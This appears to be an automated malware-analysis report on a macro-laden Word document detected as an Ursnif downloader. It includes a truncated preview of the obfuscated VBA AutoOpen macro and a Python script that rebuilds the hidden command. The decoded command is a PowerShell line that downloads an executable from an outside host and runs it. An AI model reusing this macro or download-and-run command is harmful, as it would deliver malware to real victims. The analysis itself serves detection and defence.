Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document whose VBA project contains an AutoOpen subroutine, so the payload runs as soon as the document is opened with macros enabled. The macro assembles a long command line from dozens of short string literals scattered across helper functions (interleaved with junk `Hour "..."` calls that have no effect) and passes it to `VBA.Shell` with a window style of `87 - 87`, i.e. 0 (vbHide), so no console window is shown. ClamAV classifies the document as an Ursnif downloader, and the visible macro text agrees: the command is `cmd /V:ON/C"set xDQ9=...`, where the variable value is caret-escaped (`^` is cmd.exe's escape character and is dropped at parse time) and stored reversed, followed by `for /L %N in (261;-1;0)do set AaEM=!AaEM!!xDQ9:~%N,1!`, which copies the variable one character at a time from the end to the front, and `if %N lss 1 call %AaEM:*AaEM!=`, which executes the rebuilt string on the last iteration (the `*AaEM!=` substitution matches nothing and so returns the value unchanged; the extract is cut off immediately after it). Stripping the carets and reversing the fragments visible in the extract (functions oISAjo and wFRqQii) yields a PowerShell one-liner that creates a `Net.WebClient`, downloads `http://ijqwenbasdasc.com/YUY/huonasdh.php?l=dg5.tkn` to `$env:public\774.exe` with `DownloadFile`, and runs it with `Invoke-Item`. The macro extract is truncated, so the strings returned by the remaining helpers in the Shell() argument (itZhsjiikN, TZiOHpiF, VwQbimASj, OnCPhILsEzv, PoamoRIfXFMwQN) are not shown here.
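The macro text extracted below hides its command behind three layers: VBA string concatenation, cmd.exe caret escapes, and a cmd `/V:ON` loop that re-reads the SET variable from its last character to its first. The following Python is an added illustration, not part of the analyzer's output or of the sample: it re-evaluates the string assignments visible in functions oISAjo and wFRqQii, emulates the cmd loop and the `call %AaEM:*AaEM!=%` substitution, and prints the resulting PowerShell command. The input is copied from the macro preview on this page; the order of the last fragments of wFRqQii is an assumption, because the preview is truncated after `FFTREiYvRj + sqvVhvmb + Sb`, and the helper functions that are not shown in the extract are omitted.

```python
"""Rebuild the command hidden by this sample's VBA macro (added example).

Layers: VBA string building (literals, Chr(n) and helper names joined with +),
cmd.exe caret escapes, and a cmd /V:ON for-loop that rebuilds the real command
from a SET variable stored in reverse.
"""
import re

# Constructed input: the assignment lines from functions oISAjo and wFRqQii in
# the macro preview on this page, with the no-op `Hour ...` calls dropped.
# ASSUMPTION: the preview is truncated after `FFTREiYvRj + sqvVhvmb + Sb`, so
# the rest of the wFRqQii line uses the order the names are assigned above it.
MACRO_SOURCE = r'''
FvudvtwVt = "cmd /V" + "^" + ":^ON/" + "C" + Chr(1 + 0 + 1 + 0 + 32) + "^" + "s" + "^et x^D" + "Q^9"
bwQjoob = "=" + " ^ " + " ^ ^ " + "^ " + " ^ ^ ^" + " ^ " + " ^ " + "}^}^{h" + "ct^" + "ac}" + ";kaer^" + "b^;B^U"
FNfRIpDTowk = "a^$^ m" + "e^t^I^-" + "^e^k" + "ovn^I;" + ")^B^U^" + "a$^ ^,d" + "^fB$(" + "^" + "el" + "^i^F^d^" + "a^o^" + "lnw^o^D"
NrjJB = "^" + ".N^s" + "i$^{" + "^" + "yr" + "^t{)u^" + "w" + "o$ ni^" + " d^" + "f^B^$(^"
wZhWkzAX = "hc" + "^a" + "^er^" + "of;'^ex" + "^e" + "^.'+q"
Gphzd = "iI$^+" + "^'\'+c" + "^i^" + "lb^u" + "^p:" + "v" + "n^e$^" + "=^BUa^" + "$;'^4" + "7^7' =" + "^ q" + "i"
ZFQiuvJ = "I$;" + ")^'@^'(" + "^t" + "^i" + "l" + "p^S.'" + "n^k" + "^t^" + ".5^g^d=" + "^l?^" + "p^h^"
oISAjo = FvudvtwVt + bwQjoob + FNfRIpDTowk + NrjJB + wZhWkzAX + Gphzd + ZFQiuvJ
FFTREiYvRj = "p^.^" + "hd^" + "s^ano^u" + "^h/^" + "Y^U^Y/" + "^moc."
sqvVhvmb = "c^s" + "a^d" + "sabn^e^" + "w^q^j" + "i//:^p^" + "t^t" + "h^'" + "^=^u" + "^wo$^;^" + "tne^i" + "^lCbe^W" + "^.t^eN"
SbLrb = " ^tce" + "jbo" + "-^we" + "n^=" + "N^s^i^$" + " ^l" + "le^" + "h^sre^" + "w"
twDMGoLwWA = "^" + "o^p&&^f" + "^or /" + "^L %N ^" + "in (^2" + "^"
zswZi = "61^" + ";-1;0)" + "d^" + "o s" + "^e^t " + "Aa^E^M=" + "!" + "Aa^" + "E^M!" + "!x^D" + "Q^9" + ":~%N"
zKidPz = ",1!&" + "&^i^f " + "%N ^l" + "s^" + "s" + " ^1"
TGOCMapdp = " c^a^" + "ll" + " " + "%" + "Aa" + "^E^" + "M:^*^" + "A" + "a" + "EM!^="
wFRqQii = FFTREiYvRj + sqvVhvmb + SbLrb + twDMGoLwWA + zswZi + zKidPz + TGOCMapdp
'''

_TOKEN = re.compile(r'"([^"]*)"|Chr\(([^)]*)\)|([A-Za-z_]\w*)')
_ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+)$')


def eval_vba_expr(expr, env):
    """Concatenate string literals, Chr(<sum of integers>) and previously
    assigned names; a name never assigned (an empty Variant) yields ""."""
    out = []
    for lit, chr_arg, name in _TOKEN.findall(expr):
        if chr_arg:
            out.append(chr(sum(int(n) for n in re.findall(r"\d+", chr_arg))))
        elif name:
            out.append(env.get(name, ""))
        else:
            out.append(lit)
    return "".join(out)


def evaluate_macro(source):
    """Run the string assignments top to bottom; return name -> value."""
    env = {}
    for line in source.splitlines():
        m = _ASSIGN.match(line)
        if m:
            env[m.group(1)] = eval_vba_expr(m.group(2), env)
    return env


def cmd_unescape(s):
    """Apply cmd.exe's ^ escape: ^X yields X, so ^^ yields a literal ^."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def cmd_replace(value, search, repl):
    """%VAR:search=repl% semantics: case-insensitive; a leading * replaces
    everything up to and including the first match; when the search text is
    absent the value comes back UNCHANGED, which is exactly what the
    `call %AaEM:*AaEM!=%` trick relies on to expand the rebuilt command."""
    star = search.startswith("*")
    needle = search[1:] if star else search
    idx = value.lower().find(needle.lower())
    if idx < 0:
        return value
    if star:
        return repl + value[idx + len(needle):]
    return re.sub(re.escape(needle), repl, value, flags=re.IGNORECASE)


# set SRC=<value>&&for /L %N in (start;step;end)do set ACC=!ACC!!SRC:~%N,1!&&if %N lss 1 call %ACC:*ACC!=%
_STAGE = re.compile(
    r"set (\w+)=(.*?)&&for /L %(\w+) in \((-?\d+);(-?\d+);(-?\d+)\)\s*"
    r"do set (\w+)=!\7!!\1:~%\3,1!&&if %\3 lss 1 call %\7:(\*\w+!)=%?")


def rebuild_command(shell_arg):
    """Emulate the reversal loop and the final call-time substitution."""
    m = _STAGE.search(cmd_unescape(shell_arg))
    if not m:
        raise ValueError("unrecognised stage layout")
    value = m.group(2)
    start, step, end = (int(m.group(i)) for i in (4, 5, 6))
    acc = ""
    for n in range(start, end + (1 if step > 0 else -1), step):
        acc += value[n:n + 1] if n >= 0 else ""  # cmd: out-of-range substring is ""
    return cmd_replace(acc, m.group(8), "").rstrip()


def deobfuscate(source=MACRO_SOURCE):
    """Return the visible part of the Shell() argument and the command it runs."""
    env = evaluate_macro(source)
    # Shell() concatenates CleanString(WQ) + itZhsjiikN + TZiOHpiF + oISAjo +
    # wFRqQii + ...; only oISAjo and wFRqQii survive in the extract.
    shell_arg = env["oISAjo"] + env["wFRqQii"]
    return {"shell_arg": shell_arg, "command": rebuild_command(shell_arg)}


if __name__ == "__main__":
    for key, text in deobfuscate().items():
        print(f"{key}:\n  {text}\n")
```

Running the script prints the caret-free `cmd /V:ON/C"set xDQ9=...` line and the decoded PowerShell downloader. The same three functions apply unchanged to other samples of this family: only `MACRO_SOURCE` changes, and `_STAGE` captures the variable names and loop bounds rather than hard-coding `xDQ9`, `AaEM` or 261.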
Heuristics (7)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): the macro calls Shell() to run an external command.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): an AutoOpen subroutine runs the macro automatically when the document is opened.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact extracted (macros.bas below), so the stronger OLE_VBA_* findings above are the ones to act on.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace present in ordinary Office files and is not a network indicator for this sample; the real download URL is assembled at run time from caret-escaped, reversed string fragments inside the macro and is therefore invisible to static URL extraction.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4716 bytes | 4b78e5fd21daa0f9998e5f9fa9a129416d1360e7333a2059174debdfdc42ae7d |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "lAqwHRjNiRYfA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "qs" + "330657398"
VBA.Shell CleanString(WQ) + itZhsjiikN + TZiOHpiF + oISAjo + wFRqQii + VwQbimASj + OnCPhILsEzv + PoamoRIfXFMwQN, 87 - 87
Hour "jDuoF" + "rhpR"
Hour "jiKIE" + "125" + "lfcCaWrJn" + "Kf"
End Sub
Attribute VB_Name = "UUXRlAokDvKlrm"
Function oISAjo()
On _
Error _
Resume _
Next
Hour "JdanUiwFqMi" + "4877"
Hour "1793" + "wAw"
Hour "vSW" + "dnzjDjJh"
FvudvtwVt = "cmd /V" + "^" + ":^ON/" + "C" + Chr(1 + 0 + 1 + 0 + 32) + "^" + "s" + "^et x^D" + "Q^9"
Hour "CtkwviSBrrJ" + "162471674"
Hour "LvObwViCuhi" + "UUM"
Hour "295272092" + "2147"
Hour "TsfPwmBL" + "rVTrFvF"
Hour "3081" + "132716038" + "t" + "449"
bwQjoob = "=" + " ^ " + " ^ ^ " + "^ " + " ^ ^ ^" + " ^ " + " ^ " + "}^}^{h" + "ct^" + "ac}" + ";kaer^" + "b^;B^U"
Hour "8866" + "JNQN" + "JiCbmE" + "1907"
Hour "26645297" + "kkwWdqjoZ" + "WIdPHbhizzISrM" + "3787"
Hour "69" + "6865" + "FLP" + "RF"
Hour "204056018" + "fAFlPki" + "VbQ" + "151242311"
Hour "4075" + "109247342" + "EdzOojIM" + "o"
FNfRIpDTowk = "a^$^ m" + "e^t^I^-" + "^e^k" + "ovn^I;" + ")^B^U^" + "a$^ ^,d" + "^fB$(" + "^" + "el" + "^i^F^d^" + "a^o^" + "lnw^o^D"
Hour "uF" + "t" + "btI" + "151402032"
Hour "320272536" + "sa" + "1485" + "4011"
NrjJB = "^" + ".N^s" + "i$^{" + "^" + "yr" + "^t{)u^" + "w" + "o$ ni^" + " d^" + "f^B^$(^"
Hour "kHih" + "Rfk"
Hour "drHji" + "523290374" + "ChiPu" + "M"
Hour "6526" + "tmlsK" + "joildMujK" + "506965484"
Hour "Fvlrz" + "305388675"
Hour "jIbnztQNRToGk" + "UG" + "9962" + "YFF"
Hour "63657352" + "2921"
wZhWkzAX = "hc" + "^a" + "^er^" + "of;'^ex" + "^e" + "^.'+q"
Hour "435360144" + "80683593" + "GlzFCfCHu" + "wUnsPwWLDK"
Hour "6062" + "9772"
Hour "7631" + "SPKI"
Hour "2271" + "3222" + "jvrlvJDznjNdqM" + "67045211"
Gphzd = "iI$^+" + "^'\'+c" + "^i^" + "lb^u" + "^p:" + "v" + "n^e$^" + "=^BUa^" + "$;'^4" + "7^7' =" + "^ q" + "i"
Hour "248918827" + "4069" + "Yv" + "lcjWZB"
Hour "lsBPZj" + "ILAoFm"
ZFQiuvJ = "I$;" + ")^'@^'(" + "^t" + "^i" + "l" + "p^S.'" + "n^k" + "^t^" + ".5^g^d=" + "^l?^" + "p^h^"
oISAjo = FvudvtwVt + bwQjoob + FNfRIpDTowk + NrjJB + wZhWkzAX + Gphzd + ZFQiuvJ
Hour "294450924" + "JnDKLjFf" + "FoP" + "PTAJFqWCjFH"
Hour "wFbuhtfTKimiL" + "385"
End Function
Function wFRqQii()
On _
Error _
Resume _
Next
Hour "172024154" + "rNm" + "vHMtaMpsitEqdc" + "VrmZhwwF"
Hour "wtIz" + "2826"
FFTREiYvRj = "p^.^" + "hd^" + "s^ano^u" + "^h/^" + "Y^U^Y/" + "^moc."
Hour "DWFn" + "A"
Hour "B" + "5447" + "2386" + "pFhddwC"
Hour "9010" + "P"
Hour "100173091" + "GIPBuChDOzd" + "cXP" + "hN"
sqvVhvmb = "c^s" + "a^d" + "sabn^e^" + "w^q^j" + "i//:^p^" + "t^t" + "h^'" + "^=^u" + "^wo$^;^" + "tne^i" + "^lCbe^W" + "^.t^eN"
Hour "ipOc" + "R" + "bsnS" + "lDO"
Hour "frO" + "BRh" + "rsDVa" + "47604657"
SbLrb = " ^tce" + "jbo" + "-^we" + "n^=" + "N^s^i^$" + " ^l" + "le^" + "h^sre^" + "w"
Hour "2146" + "1349"
Hour "1487" + "WWj"
Hour "sSw" + "2678" + "njY" + "422190994"
Hour "NcdG" + "4947" + "IAzWtcqil" + "487046132"
Hour "RoMHvmmT" + "LJh"
twDMGoLwWA = "^" + "o^p&&^f" + "^or /" + "^L %N ^" + "in (^2" + "^"
Hour "273226811" + "142406773"
Hour "Lp" + "LBzLDwsbIXBp" + "8104" + "2145"
Hour "YCDYRijanXs" + "763"
Hour "Tm" + "TFFbQQVD"
zswZi = "61^" + ";-1;0)" + "d^" + "o s" + "^e^t " + "Aa^E^M=" + "!" + "Aa^" + "E^M!" + "!x^D" + "Q^9" + ":~%N"
Hour "DlUanKUAmjfPwA" + "pQb" + "KBzaV" + "3879"
zKidPz = ",1!&" + "&^i^f " + "%N ^l" + "s^" + "s" + " ^1"
Hour "279370980" + "OpdvEKzUcN" + "pIw" + "f"
Hour "JLilXkuPqvlCjq" + "5627" + "K" + "Xhubf"
TGOCMapdp = " c^a^" + "ll" + " " + "%" + "Aa" + "^E^" + "M:^*^" + "A" + "a" + "EM!^="
wFRqQii = FFTREiYvRj + sqvVhvmb + Sb
... (truncated)